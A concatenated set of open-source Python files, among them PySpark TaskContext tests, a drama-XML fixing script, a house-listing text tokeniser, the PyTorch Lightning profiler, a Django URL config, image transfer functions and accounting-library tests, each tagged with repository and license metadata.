attempt_number = tc.attemptNumber()
partition_id = tc.partitionId()
attempt_id = tc.taskAttemptId()
if attempt_number == 0 and partition_id == 0:
raise Exception("Failing on first attempt")
else:
return [x, partition_id, attempt_number, attempt_id]
result = rdd.map(fail_on_first).collect()
# We should re-submit the first partition to it but other partitions should be attempt 0
self.assertEqual([0, 0, 1], result[0][0:3])
self.assertEqual([9, 3, 0], result[9][0:3])
first_partition = filter(lambda x: x[1] == 0, result)
map(lambda x: self.assertEqual(1, x[2]), first_partition)
other_partitions = filter(lambda x: x[1] != 0, result)
map(lambda x: self.assertEqual(0, x[2]), other_partitions)
# The task attempt id should be different
self.assertTrue(result[0][3] != result[9][3])
def test_tc_on_driver(self):
"""Verify that getting the TaskContext on the driver returns None."""
tc = TaskContext.get()
self.assertTrue(tc is None)
def test_get_local_property(self):
"""Verify that local properties set on the driver are available in TaskContext."""
key = "testkey"
value = "testvalue"
self.sc.setLocalProperty(key, value)
try:
rdd = self.sc.parallelize(range(1), 1)
prop1 = rdd.map(lambda _: TaskContext.get().getLocalProperty(key)).collect()[0]
self.assertEqual(prop1, value)
prop2 = rdd.map(lambda _: TaskContext.get().getLocalProperty("otherkey")).collect()[0]
self.assertTrue(prop2 is None)
finally:
self.sc.setLocalProperty(key, None)
def test_barrier(self):
"""
Verify that BarrierTaskContext.barrier() performs global sync among all barrier tasks
within a stage.
"""
rdd = self.sc.parallelize(range(10), 4)
def f(iterator):
yield sum(iterator)
def context_barrier(x):
tc = BarrierTaskContext.get()
time.sleep(random.randint(1, 10))
tc.barrier()
return time.time()
times = rdd.barrier().mapPartitions(f).map(context_barrier).collect()
self.assertTrue(max(times) - min(times) < 1)
def test_barrier_infos(self):
"""
Verify that BarrierTaskContext.getTaskInfos() returns a list of all task infos in the
barrier stage.
"""
rdd = self.sc.parallelize(range(10), 4)
def f(iterator):
yield sum(iterator)
taskInfos = rdd.barrier().mapPartitions(f).map(lambda x: BarrierTaskContext.get()
.getTaskInfos()).collect()
self.assertTrue(len(taskInfos) == 4)
self.assertTrue(len(taskInfos[0]) == 4)
def test_context_get(self):
"""
Verify that TaskContext.get() works both in or not in a barrier stage.
"""
rdd = self.sc.parallelize(range(10), 4)
def f(iterator):
taskContext = TaskContext.get()
if isinstance(taskContext, BarrierTaskContext):
yield taskContext.partitionId() + 1
elif isinstance(taskContext, TaskContext):
yield taskContext.partitionId() + 2
else:
yield -1
# for normal stage
result1 = rdd.mapPartitions(f).collect()
self.assertTrue(result1 == [2, 3, 4, 5])
# for barrier stage
result2 = rdd.barrier().mapPartitions(f).collect()
self.assertTrue(result2 == [1, 2, 3, 4])
def test_barrier_context_get(self):
"""
Verify that BarrierTaskContext.get() should only works in a barrier stage.
"""
rdd = self.sc.parallelize(range(10), 4)
def f(iterator):
try:
taskContext = BarrierTaskContext.get()
except Exception:
yield -1
else:
yield taskContext.partitionId()
# for normal stage
result1 = rdd.mapPartitions(f).collect()
self.assertTrue(result1 == [-1, -1, -1, -1])
# for barrier stage
result2 = rdd.barrier().mapPartitions(f).collect()
self.assertTrue(result2 == [0, 1, 2, 3])
class TaskContextTestsWithWorkerReuse(unittest.TestCase):
def setUp(self):
class_name = self.__class__.__name__
conf = SparkConf().set("spark.python.worker.reuse", "true")
self.sc = SparkContext('local[2]', class_name, conf=conf)
def test_barrier_with_python_worker_reuse(self):
"""
Regression test for SPARK-25921: verify that BarrierTaskContext.barrier() with
reused python worker.
"""
# start a normal job first to start all workers and get all worker pids
worker_pids = self.sc.parallelize(range(2), 2).map(lambda x: os.getpid()).collect()
# the worker will reuse in this barrier job
rdd = self.sc.parallelize(range(10), 2)
def f(iterator):
yield sum(iterator)
def context_barrier(x):
tc = BarrierTaskContext.get()
time.sleep(random.randint(1, 10))
tc.barrier()
return (time.time(), os.getpid())
result = rdd.barrier().mapPartitions(f).map(context_barrier).collect()
times = list(map(lambda x: x[0], result))
pids = list(map(lambda x: x[1], result))
# check both barrier and worker reuse effect
self.assertTrue(max(times) - min(times) < 1)
for pid in pids:
self.assertTrue(pid in worker_pids)
def test_task_context_correct_with_python_worker_reuse(self):
"""Verify the task context correct when reused python worker"""
# start a normal job first to start all workers and get all worker pids
worker_pids = self.sc.parallelize(xrange(2), 2).map(lambda x: os.getpid()).collect()
# the worker will reuse in this barrier job
rdd = self.sc.parallelize(xrange(10), 2)
def context(iterator):
tp = TaskContext.get().partitionId()
try:
bp = BarrierTaskContext.get().partitionId()
except Exception:
bp = -1
yield (tp, bp, os.getpid())
# normal stage after normal stage
normal_result = rdd.mapPartitions(context).collect()
tps, bps, pids = zip(*normal_result)
print(tps)
self.assertTrue(tps == (0, 1))
self.assertTrue(bps == (-1, -1))
for pid in pids:
self.assertTrue(pid in worker_pids)
# barrier stage after normal stage
barrier_result = rdd.barrier().mapPartitions(context).collect()
tps, bps, pids = zip(*barrier_result)
self.assertTrue(tps == (0, 1))
self.assertTrue(bps == (0, 1))
for pid in pids:
self.assertTrue(pid in worker_pids)
# normal stage after barrier stage
normal_result2 = rdd.mapPartitions(context).collect()
tps, bps, pids = zip(*normal_result2)
self.assertTrue(tps == (0, 1))
self.assertTrue(bps == (-1, -1))
for pid in pids:
self.assertTrue(pid in worker_pids)
def tearDown(self):
self.sc.stop()
class TaskContextTestsWithResources(unittest.TestCase):
def setUp(self):
class_name = self.__class__.__name__
self.tempFile = tempfile.NamedTemporaryFile(delete=False)
self.tempFile.write(b'echo {\\"name\\": \\"gpu\\", \\"addresses\\": [\\"0\\"]}')
self.tempFile.close()
# create temporary directory for Worker resources coordination
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
os.chmod(self.tempFile.name, stat.S_IRWXU | stat.S_IXGRP | stat.S_IRGRP |
stat.S_IROTH | stat.S_IXOTH)
conf = SparkConf().set("spark.test.home", SPARK_HOME)
conf = conf.set("spark.resources.dir", self.tempdir.name)
conf = conf.set("spark.worker.resource.gpu.discoveryScript", self.tempFile.name)
conf = conf.set("spark.worker.resource.gpu.amount", 1)
conf = conf.set("spark.task.resource.gpu.amount", "1")
conf = conf.set("spark.executor.resource.gpu.amount", "1")
self.sc = SparkContext('local-cluster[2,1,1024]', class_name, conf=conf)
def test_resources(self):
"""Test the resources are available."""
rdd = self.sc.parallelize(range(10))
resources = rdd.map(lambda x: TaskContext.get().resources()).take(1)[0]
self.assertEqual(len(resources), 1)
self.assertTrue('gpu' in resources)
self.assertEqual(resources['gpu'].name, 'gpu')
self.assertEqual(resources['gpu'].addresses, ['0'])
def tearDown(self):
os.unlink(self.tempFile.name)
shutil.rmtree(self.tempdir.name)
self.sc.stop()
if __name__ == "__main__":
import unittest
from pyspark.tests.test_taskcontext import *
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
| darionyaphet/spark | python/pyspark/tests/test_taskcontext.py | Python | apache-2.0 | 12,677 |
#!/usr/bin/python
from lxml import etree
import sys
import re
def promote(el):
# snips el out of parent, creates it as a sibling of parent under container, and
# creates a new copy of parent with type="split" to contain all trailing content
# of parent after el. may be called repeatedly. returns the new, promoted copy
# of el.
parent = el.getparent()
container = parent.getparent()
for i,child in enumerate(container):
if child == parent:
for j,grandchild in enumerate(child):
if grandchild == el:
# first we make a copy of the element in its grandparent
container.insert(i+1,etree.Element(el.tag,attrib={"type":"promoted"}))
new_el = container[i+1]
new_el.text = el.text
for e in el.getchildren():
# untested, since stages have no children in the monk shakespeare.
new_el.append(e)
# then we make a new copy of the parent after that, to hold all the trailing
# content and nodes.
container.insert(i+2,etree.Element(parent.tag,attrib=parent.attrib))
split_parent = container[i+2]
split_parent.attrib["type"] = "split"
split_parent.text = el.tail # tricky.
# then we iterate over the children of parent after el,
# and move them to the split_parent
for gc in child[j+1:]:
split_parent.append(gc)
# although it's undocumented, append() appears to also remove gc from the parent
# for us; attempting to do so manually raises a
# ValueError: Element is not a child of this node.
# still, should test carefully.
split_parent.tail = parent.tail # again tricky.
parent.tail = ""
parent.remove(el)
break
break
return new_el
for file in sys.argv[1:]:
fd = open(file)
print >> sys.stderr, "reading ", file
text_string = fd.read()
root = etree.fromstring(text_string)
# remove namespaces
for el in root.getiterator():
# match clark-style namespace notation
if el.tag.startswith("{"):
old_tag = el.tag
el.tag = re.sub("^[^}]+}","",el.tag)
for el in root.getiterator():
if el.tag == "stage":
working_el = el
while "sp" in [a.tag for a in working_el.iterancestors()]:
working_el = promote(working_el)
new_file = file + ".fixed"
print >> sys.stderr, "writing ", new_file
new_file = open(new_file,"w")
new_file.write("<?xml version='1.0' encoding='utf-8'?>")
tree = etree.ElementTree(root)
new_string = etree.tostring(tree,encoding="utf-8")
new_string = new_string.decode("utf-8").encode("utf-8")
new_file.write(new_string)
| clovis/PhiloLogic4 | extras/utilities/fix_drama.py | Python | gpl-3.0 | 3,165 |
import cPickle
import nz_houses_dao as dao
from nltk.corpus import stopwords
import re
import gzip
class Residential:
distionary
def
def __init__():
pass
def generate_word_lists(descriptions):
descriptions_features = {}
i = 0
for listingId in descriptions.keys():
a = descriptions[listingId].lower()
a = re.sub(r'\d+',r'',a)
a = re.sub(r'sqm',r'',a)
a = re.sub(r'm2',r'',a)
a_words = re.findall(r'\w+',a) #,flags = re.UNICODE | re.LOCALE)
a_words = filter(lambda x: x not in stopwords.words('english'), a_words)
descriptions_features[listingId] = a_words
if i % 50 == 0:
print i
i += 1
return descriptions_features
def print_words(a_words):
b = ''
for word in a_words:
b = b + str(word) + ' '
print b
if __name__ == '__main__':
dbFilePath = '/Users/james/development/code_personal/nz-houses/db/prod1.db'
#df_1 = read_listing_table(dbFilePath)
#df_1 = df_sqlite[df_sqlite['ListingId'] > 641386568]
#print df_1.describe()
#a = df_1[-1:]['Body']
#print a.to_string()
query_result = dao.read_listing_table(dbFilePath)
pickle_flag = 1
if pickle_flag == 0:
descriptions = {}
for row in query_result:
descriptions[row[0]] = row[1]
descriptions_features = generate_word_lists(descriptions)
with gzip.open('/Users/james/development/code_personal/nz-houses/db/descriptions_features.pkl.gz', 'wb') as f:
cPickle.dump(descriptions_features, f, protocol=2)
if pickle_flag == 1:
with gzip.open('/Users/james/development/code_personal/nz-houses/db/descriptions_features.pkl.gz', 'rb') as f:
descriptions_features = cPickle.load(f)
i = 0
for listingId in reversed(descriptions_features.keys()):
print listingId
print_words(descriptions_features[listingId])
print '-----------'
i += 1
if i == 10:
break
| statX/nz-houses | analysis/listing_text.py | Python | bsd-2-clause | 1,824 |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Profiler to check if there are any bottlenecks in your code."""
import inspect
import logging
import os
from functools import partial
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Set, Type, TYPE_CHECKING, Union
import torch
from torch import nn, Tensor
from torch.autograd.profiler import record_function
from pytorch_lightning.profiler.base import BaseProfiler
from pytorch_lightning.utilities import rank_zero_warn
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.imports import _KINETO_AVAILABLE
if TYPE_CHECKING:
from torch.autograd.profiler import EventList
from torch.utils.hooks import RemovableHandle
from pytorch_lightning.core.lightning import LightningModule
if _KINETO_AVAILABLE:
from torch.profiler import ProfilerAction, ProfilerActivity, tensorboard_trace_handler
log = logging.getLogger(__name__)
_PROFILER = Union[torch.autograd.profiler.profile, torch.cuda.profiler.profile, torch.autograd.profiler.emit_nvtx]
class RegisterRecordFunction:
"""
While profiling autograd operations, this class will add labels for module names around the forward function.
The Lightning PyTorch Profiler will activate this feature automatically. It can be deactivated as follows:
Example::
from pytorch_lightning.profilers import PyTorchProfiler
profiler = PyTorchProfiler(record_module_names=False)
Trainer(profiler=profiler)
It can be used outside of Lightning as follows:
Example::
from pytorch_lightning import Trainer, seed_everything
with RegisterRecordFunction(model):
out = model(batch)
"""
def __init__(self, model: nn.Module) -> None:
self._model = model
self._records: Dict[str, record_function] = {}
self._handles: Dict[str, List["RemovableHandle"]] = {}
def _start_recording_forward(self, _: nn.Module, input: Tensor, record_name: str) -> Tensor:
record = record_function(record_name)
record.__enter__()
self._records[record_name] = record
return input
def _stop_recording_forward(self, _: nn.Module, __: Tensor, output: Tensor, record_name: str) -> Tensor:
self._records[record_name].__exit__(None, None, None)
return output
def __enter__(self) -> None:
for module_name, module in self._model.named_modules():
if module_name:
full_name = f"{type(module).__module__}.{type(module).__name__}"
record_name = f"{full_name}: {module_name}"
pre_forward_handle = module.register_forward_pre_hook(
partial(self._start_recording_forward, record_name=record_name)
)
post_forward_handle = module.register_forward_hook(
partial(self._stop_recording_forward, record_name=record_name)
)
self._handles[module_name] = [pre_forward_handle, post_forward_handle]
def __exit__(self, type: Any, value: Any, traceback: Any) -> None:
for handles in self._handles.values():
for h in handles:
h.remove()
self._handles = {}
class ScheduleWrapper:
"""
This class is used to override the schedule logic from the profiler and perform
recording for both `training_step`, `validation_step`.
"""
def __init__(self, schedule: Callable) -> None:
if not _KINETO_AVAILABLE:
raise ModuleNotFoundError("You are trying to use `ScheduleWrapper` which require kineto install.")
self._schedule = schedule
self.reset()
def setup(self, start_action_name: str) -> None:
self._start_action_name = start_action_name
def pre_step(self, current_action: str) -> None:
self._current_action = current_action
def reset(self):
self._num_optimizer_step_and_closure = 0
self._num_validation_step = 0
self._num_test_step = 0
self._num_predict_step = 0
self._optimizer_step_and_closure_reached_end = False
self._validation_step_reached_end = False
self._test_step_reached_end = False
self._predict_step_reached_end = False
# used to stop profiler when `ProfilerAction.RECORD_AND_SAVE` is reached.
self._current_action: Optional[str] = None
self._start_action_name: Optional[str] = None
@property
def num_step(self) -> int:
if self._current_action is not None and self._current_action.startswith("optimizer_step_and_closure_"):
return self._num_optimizer_step_and_closure
if self._current_action == "validation_step":
return self._num_validation_step
if self._current_action == "test_step":
return self._num_test_step
if self._current_action == "predict_step":
return self._num_predict_step
return 0
def _step(self) -> None:
if self._current_action is not None and self._current_action.startswith("optimizer_step_and_closure_"):
self._num_optimizer_step_and_closure += 1
elif self._current_action == "validation_step":
if self._start_action_name == "on_fit_start":
if self._num_optimizer_step_and_closure > 0:
self._num_validation_step += 1
else:
self._num_validation_step += 1
elif self._current_action == "test_step":
self._num_test_step += 1
elif self._current_action == "predict_step":
self._num_predict_step += 1
@property
def has_finished(self) -> bool:
if self._current_action is not None and self._current_action.startswith("optimizer_step_and_closure_"):
return self._optimizer_step_and_closure_reached_end
if self._current_action == "validation_step":
return self._validation_step_reached_end
if self._current_action == "test_step":
return self._test_step_reached_end
if self._current_action == "predict_step":
return self._predict_step_reached_end
return False
def __call__(self, num_step: int) -> "ProfilerAction":
# ignore the provided input. Keep internal state instead.
if self.has_finished:
return ProfilerAction.NONE
self._step()
action = self._schedule(self.num_step)
if action == ProfilerAction.RECORD_AND_SAVE:
if self._current_action is not None and self._current_action.startswith("optimizer_step_and_closure_"):
self._optimizer_step_and_closure_reached_end = True
elif self._current_action == "validation_step":
self._validation_step_reached_end = True
elif self._current_action == "test_step":
self._test_step_reached_end = True
elif self._current_action == "predict_step":
self._predict_step_reached_end = True
return action
class PyTorchProfiler(BaseProfiler):
RECORD_FUNCTIONS = {
"training_step_and_backward",
"training_step",
"backward",
"validation_step",
"test_step",
"predict_step",
}
RECORD_FUNCTION_PREFIX = "optimizer_step_and_closure_"
STEP_FUNCTIONS = {"validation_step", "test_step", "predict_step"}
STEP_FUNCTION_PREFIX = "optimizer_step_and_closure_"
AVAILABLE_SORT_KEYS = {
"cpu_time",
"cuda_time",
"cpu_time_total",
"cuda_time_total",
"cpu_memory_usage",
"cuda_memory_usage",
"self_cpu_memory_usage",
"self_cuda_memory_usage",
"count",
}
START_RECORD_FUNCTIONS = {"on_fit_start", "on_validation_start", "on_test_start", "on_predict_start"}
def __init__(
self,
dirpath: Optional[Union[str, Path]] = None,
filename: Optional[str] = None,
group_by_input_shapes: bool = False,
emit_nvtx: bool = False,
export_to_chrome: bool = True,
row_limit: int = 20,
sort_by_key: Optional[str] = None,
record_functions: Set[str] = None,
record_module_names: bool = True,
**profiler_kwargs: Any,
) -> None:
"""
This profiler uses PyTorch's Autograd Profiler and lets you inspect the cost of
different operators inside your model - both on the CPU and GPU
Args:
dirpath: Directory path for the ``filename``. If ``dirpath`` is ``None`` but ``filename`` is present, the
``trainer.log_dir`` (from :class:`~pytorch_lightning.loggers.tensorboard.TensorBoardLogger`)
will be used.
filename: If present, filename where the profiler results will be saved instead of printing to stdout.
The ``.txt`` extension will be used automatically.
group_by_input_shapes: Include operator input shapes and group calls by shape.
emit_nvtx: Context manager that makes every autograd operation emit an NVTX range
Run::
nvprof --profile-from-start off -o trace_name.prof -- <regular command here>
To visualize, you can either use::
nvvp trace_name.prof
torch.autograd.profiler.load_nvprof(path)
export_to_chrome: Whether to export the sequence of profiled operators for Chrome.
It will generate a ``.json`` file which can be read by Chrome.
row_limit: Limit the number of rows in a table, ``-1`` is a special value that
removes the limit completely.
sort_by_key: Attribute used to sort entries. By default
they are printed in the same order as they were registered.
Valid keys include: ``cpu_time``, ``cuda_time``, ``cpu_time_total``,
``cuda_time_total``, ``cpu_memory_usage``, ``cuda_memory_usage``,
``self_cpu_memory_usage``, ``self_cuda_memory_usage``, ``count``.
record_functions: Set of profiled functions which will create a context manager on.
Any other will be pass through.
record_module_names: Whether to add module names while recording autograd operation.
profiler_kwargs: Keyword arguments for the PyTorch profiler. This depends on your PyTorch version
Raises:
MisconfigurationException:
If arg ``sort_by_key`` is not present in ``AVAILABLE_SORT_KEYS``.
If arg ``schedule`` is not a ``Callable``.
If arg ``schedule`` does not return a ``torch.profiler.ProfilerAction``.
"""
super().__init__(dirpath=dirpath, filename=filename)
self._group_by_input_shapes = group_by_input_shapes and profiler_kwargs.get("record_shapes", False)
self._emit_nvtx = emit_nvtx
self._export_to_chrome = export_to_chrome
self._row_limit = row_limit
self._sort_by_key = sort_by_key or f"{'cuda' if profiler_kwargs.get('use_cuda', False) else 'cpu'}_time_total"
self._user_record_functions = record_functions or set()
self._record_functions_start = self._user_record_functions | self.START_RECORD_FUNCTIONS
self._record_functions = self._user_record_functions | self.RECORD_FUNCTIONS
self._record_module_names = record_module_names
self._profiler_kwargs = profiler_kwargs
self.profiler: Optional[_PROFILER] = None
self.function_events: Optional["EventList"] = None
self._lightning_module: Optional["LightningModule"] = None # set by ProfilerConnector
self._register: Optional[RegisterRecordFunction] = None
self._parent_profiler: Optional[_PROFILER] = None
self._recording_map: Dict[str, record_function] = {}
self._start_action_name: Optional[str] = None
self._schedule: Optional[ScheduleWrapper] = None
if _KINETO_AVAILABLE:
self._init_kineto(profiler_kwargs)
if self._sort_by_key not in self.AVAILABLE_SORT_KEYS:
raise MisconfigurationException(
f"Found sort_by_key: {self._sort_by_key}. Should be within {self.AVAILABLE_SORT_KEYS}. "
)
def _init_kineto(self, profiler_kwargs: Any) -> None:
has_schedule = "schedule" in profiler_kwargs
self._has_on_trace_ready = "on_trace_ready" in profiler_kwargs
schedule = profiler_kwargs.get("schedule", None)
if schedule is not None:
if not isinstance(schedule, Callable):
raise MisconfigurationException(f"Schedule should be a callable. Found: {schedule}")
action = schedule(0)
if not isinstance(action, ProfilerAction):
raise MisconfigurationException(
f"Schedule should return a `torch.profiler.ProfilerAction`. Found: {action}"
)
schedule = schedule if has_schedule else self._default_schedule()
self._schedule = ScheduleWrapper(schedule) if schedule is not None else schedule
self._profiler_kwargs["schedule"] = self._schedule
activities = profiler_kwargs.get("activities", None)
self._profiler_kwargs["activities"] = activities or self._default_activities()
self._export_to_flame_graph = profiler_kwargs.get("export_to_flame_graph", False)
self._metric = profiler_kwargs.get("metric", "self_cpu_time_total")
with_stack = profiler_kwargs.get("with_stack", False) or self._export_to_flame_graph
self._profiler_kwargs["with_stack"] = with_stack
@staticmethod
def _default_schedule() -> Optional[callable]:
if _KINETO_AVAILABLE:
# Those schedule defaults allow the profiling overhead to be negligible over training time.
return torch.profiler.schedule(wait=1, warmup=1, active=3)
def _default_activities(self) -> List["ProfilerActivity"]:
activities = []
if not _KINETO_AVAILABLE:
return activities
if self._profiler_kwargs.get("use_cpu", True):
activities.append(ProfilerActivity.CPU)
if self._profiler_kwargs.get("use_cuda", torch.cuda.is_available()):
activities.append(ProfilerActivity.CUDA)
return activities
def start(self, action_name: str) -> None:
if self.profiler is None and action_name in self._record_functions_start:
# close profiler if it is already opened. might happen if 2 profilers
# are created and the first one did not call `describe`
try:
torch.autograd._disable_profiler()
except (AttributeError, RuntimeError):
pass
if self._schedule is not None:
self._schedule.setup(action_name)
self._create_profilers()
profiler = self.profiler.__enter__()
if profiler is not None:
self.profiler = profiler
if self._parent_profiler is not None:
self._parent_profiler.__enter__()
if self._register is not None:
self._register.__enter__()
if (
self.profiler is not None
and (action_name in self._record_functions or action_name.startswith(self.RECORD_FUNCTION_PREFIX))
and action_name not in self._recording_map
):
recording = record_function(action_name)
recording.__enter__()
self._recording_map[action_name] = recording
def stop(self, action_name: str) -> None:
if action_name in self._recording_map:
self._recording_map[action_name].__exit__(None, None, None)
del self._recording_map[action_name]
if not _KINETO_AVAILABLE or self._emit_nvtx:
return
if self.profiler is not None and (
action_name in self.STEP_FUNCTIONS or action_name.startswith(self.STEP_FUNCTION_PREFIX)
):
if self._schedule is not None:
self._schedule.pre_step(action_name)
def on_trace_ready(profiler):
if self.dirpath is not None:
if self._export_to_chrome:
handler = tensorboard_trace_handler(
self.dirpath, self._prepare_filename(action_name=action_name, extension="")
)
handler(profiler)
if self._export_to_flame_graph:
path = os.path.join(
self.dirpath, self._prepare_filename(action_name=action_name, extension=".stack")
)
profiler.export_stacks(path, metric=self._metric)
else:
rank_zero_warn("The PyTorchProfiler failed to export trace as `dirpath` is None")
if not self._has_on_trace_ready:
self.profiler.on_trace_ready = on_trace_ready
if self._schedule is not None:
self.profiler.step_num = self._schedule.num_step
self.profiler.step()
def summary(self) -> str:
if not self._profiler_kwargs.get("enabled", True) or self._emit_nvtx:
return ""
self._delete_profilers()
if not self.function_events:
return ""
if self._export_to_chrome and not _KINETO_AVAILABLE:
filename = f"{self.local_rank}_trace.json"
path_to_trace = filename if self.dirpath is None else os.path.join(self.dirpath, filename)
self.function_events.export_chrome_trace(path_to_trace)
data = self.function_events.key_averages(group_by_input_shapes=self._group_by_input_shapes)
table = data.table(sort_by=self._sort_by_key, row_limit=self._row_limit)
recorded_stats = {"records": table}
return self._stats_to_str(recorded_stats)
def _create_profilers(self) -> None:
if self._emit_nvtx:
self._parent_profiler = self._create_profiler(torch.cuda.profiler.profile)
self.profiler = self._create_profiler(torch.autograd.profiler.emit_nvtx)
else:
self._parent_profiler = None
self.profiler = self._create_profiler(
torch.profiler.profile if _KINETO_AVAILABLE else torch.autograd.profiler.profile
)
if self._record_module_names and self._lightning_module is not None:
self._register = RegisterRecordFunction(self._lightning_module)
def _create_profiler(self, profiler: Type[_PROFILER]) -> _PROFILER:
init_parameters = inspect.signature(profiler.__init__).parameters
kwargs = {k: v for k, v in self._profiler_kwargs.items() if k in init_parameters}
return profiler(**kwargs)
def _cache_functions_events(self) -> None:
if self._emit_nvtx:
return
self.function_events = self.profiler.events() if _KINETO_AVAILABLE else self.profiler.function_events
def _delete_profilers(self) -> None:
if self.profiler is not None:
self.profiler.__exit__(None, None, None)
self._cache_functions_events()
self.profiler = None
if self._schedule is not None:
self._schedule.reset()
if self._parent_profiler is not None:
self._parent_profiler.__exit__(None, None, None)
self._parent_profiler = None
if self._register is not None:
self._register.__exit__(None, None, None)
self._register = None
def teardown(self, stage: Optional[str] = None) -> None:
self._delete_profilers()
for k in self._recording_map:
self.stop(k)
self._recording_map = {}
super().teardown(stage=stage)
| williamFalcon/pytorch-lightning | pytorch_lightning/profiler/pytorch.py | Python | apache-2.0 | 20,415 |
from django.conf.urls import patterns, include, url
urlpatterns = [
url(r'^all/', 'article.views.articles'),
url(r'^get/(?P<article_id>\d+)/$', 'article.views.article'),
url(r'^language/(?P<language>[a-z\-]+)/$', 'article.views.language'),
]
| TheProphet007/BLOG-Django- | article/urls.py | Python | gpl-3.0 | 248 |
"""
TransferFns: accept and modify a 2d array
$Id$
"""
__version__='$Revision$'
import numpy
import param
class TransferFn(param.Parameterized):
"""
Function object to modify a matrix in place, e.g. for normalization.
Used for transforming an array of intermediate results into a
final version, by cropping it, normalizing it, squaring it, etc.
Objects in this class must support being called as a function with
one matrix argument, and are expected to change that matrix in place.
"""
__abstract = True
# CEBALERT: can we have this here - is there a more appropriate
# term for it, general to output functions? JAB: Please do rename it!
norm_value = param.Parameter(default=None)
def __call__(self,x):
raise NotImplementedError
# Trivial example of a TransferFn, provided for when a default
# is needed. The other concrete OutputFunction classes are stored
# in transferfn/, to be imported as needed.
class IdentityTF(TransferFn):
"""
Identity function, returning its argument as-is.
For speed, calling this function object is sometimes optimized
away entirely. To make this feasible, it is not allowable to
derive other classes from this object, modify it to have different
behavior, add side effects, or anything of that nature.
"""
def __call__(self,x,sum=None):
pass
class Threshold(TransferFn):
"""
Forces all values below a threshold to zero, and leaves others unchanged.
"""
threshold = param.Number(default=0.25, doc="""
Decision point for determining values to clip.""")
def __call__(self,x):
minimum(x,self.threshold,x)
class BinaryThreshold(TransferFn):
"""
Forces all values below a threshold to zero, and above it to 1.0.
"""
threshold = param.Number(default=0.25, doc="""
Decision point for determining binary value.""")
def __call__(self,x):
above_threshold = x>=self.threshold
x *= 0.0
x += above_threshold
class DivisiveNormalizeL1(TransferFn):
"""
TransferFn that divides an array by its L1 norm.
This operation ensures that the sum of the absolute values of the
array is equal to the specified norm_value, rescaling each value
to make this true. The array is unchanged if the sum of absolute
values is zero. For arrays of non-negative values where at least
one is non-zero, this operation is equivalent to a divisive sum
normalization.
"""
norm_value = param.Number(default=1.0)
def __call__(self,x):
"""L1-normalize the input array, if it has a nonzero sum."""
current_sum = 1.0*numpy.sum(abs(x.ravel()))
if current_sum != 0:
factor = (self.norm_value/current_sum)
x *= factor
class DivisiveNormalizeL2(TransferFn):
"""
TransferFn to divide an array by its Euclidean length (aka its L2 norm).
For a given array interpreted as a flattened vector, keeps the
Euclidean length of the vector at a specified norm_value.
"""
norm_value = param.Number(default=1.0)
def __call__(self,x):
xr = x.ravel()
tot = 1.0*numpy.sqrt(numpy.dot(xr,xr))
if tot != 0:
factor = (self.norm_value/tot)
x *= factor
class DivisiveNormalizeLinf(TransferFn):
"""
TransferFn to divide an array by its L-infinity norm
(i.e. the maximum absolute value of its elements).
For a given array interpreted as a flattened vector, scales the
elements divisively so that the maximum absolute value is the
specified norm_value.
The L-infinity norm is also known as the divisive infinity norm
and Chebyshev norm.
"""
norm_value = param.Number(default=1.0)
def __call__(self,x):
tot = 1.0*(numpy.abs(x)).max()
if tot != 0:
factor = (self.norm_value/tot)
x *= factor
def norm(v,p=2):
"""
Returns the Lp norm of v, where p is an arbitrary number defaulting to 2.
"""
return (numpy.abs(v)**p).sum()**(1.0/p)
class DivisiveNormalizeLp(TransferFn):
"""
TransferFn to divide an array by its Lp-Norm, where p is specified.
For a parameter p and a given array interpreted as a flattened
vector, keeps the Lp-norm of the vector at a specified norm_value.
Faster versions are provided separately for the typical L1-norm
and L2-norm cases. Defaults to be the same as an L2-norm, i.e.,
DivisiveNormalizeL2.
"""
p = param.Number(default=2)
norm_value = param.Number(default=1.0)
def __call__(self,x):
tot = 1.0*norm(x.ravel(),self.p)
if tot != 0:
factor = (self.norm_value/tot)
x *=factor
| ioam/svn-history | imagen/transferfn.py | Python | bsd-3-clause | 4,774 |
import unittest
from decimal import Decimal
from importasol.entorno import EntornoSOL
from fields import TestFile
from importasol.db.contasol import APU, Asiento
from StringIO import StringIO
class TestEntorno(unittest.TestCase):
def test_entorno(self):
e = EntornoSOL()
f1 = TestFile()
e.bind(f1)
self.assertEqual(e, f1.entorno)
e.unbind(f1)
self.assertEqual(None, f1.entorno)
def test_asiento(self):
e = EntornoSOL()
ap1 = APU()
ap1.euros = 1000
ap2 = APU()
ap2.euros = -500
ap3 = APU()
ap3.euros = -500
asi = Asiento(apuntes=[ap1, ap2, ap3])
asi.vincular(e)
self.assertListEqual([e, e, e],
[ap1.entorno, ap2.entorno, ap3.entorno])
asi.desvincular()
self.assertListEqual([None, None, None],
[ap1.entorno, ap2.entorno, ap3.entorno])
def test_eventos(self):
def on_bind(tipo, entorno, obj):
obj.manipulated = 1
def on_unbind(tipo, entorno, obj):
obj.manipulated = 2
e = EntornoSOL()
e.on_pre_bind += on_bind
e.on_pre_unbind += on_unbind
ap1 = APU()
ap1.manipulated = 0
ap1.euros = 1000
e.bind(ap1)
self.assertEqual(1, ap1.manipulated)
e.unbind(ap1)
self.assertEqual(ap1.manipulated, 2)
def test_generacion_xls(self):
e = EntornoSOL()
ap1 = APU()
ap1.euros = 1000
ap2 = APU()
ap2.euros = -500
ap3 = APU()
ap3.euros = -500
asi = Asiento(apuntes=[ap1, ap2, ap3])
asi.vincular(e)
f = StringIO()
e.generar_xls_table('APU', f)
| telenieko/importasol | tests/entorno.py | Python | bsd-3-clause | 1,729 |
# Copyright 2014
# The Cloudscaling Group, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
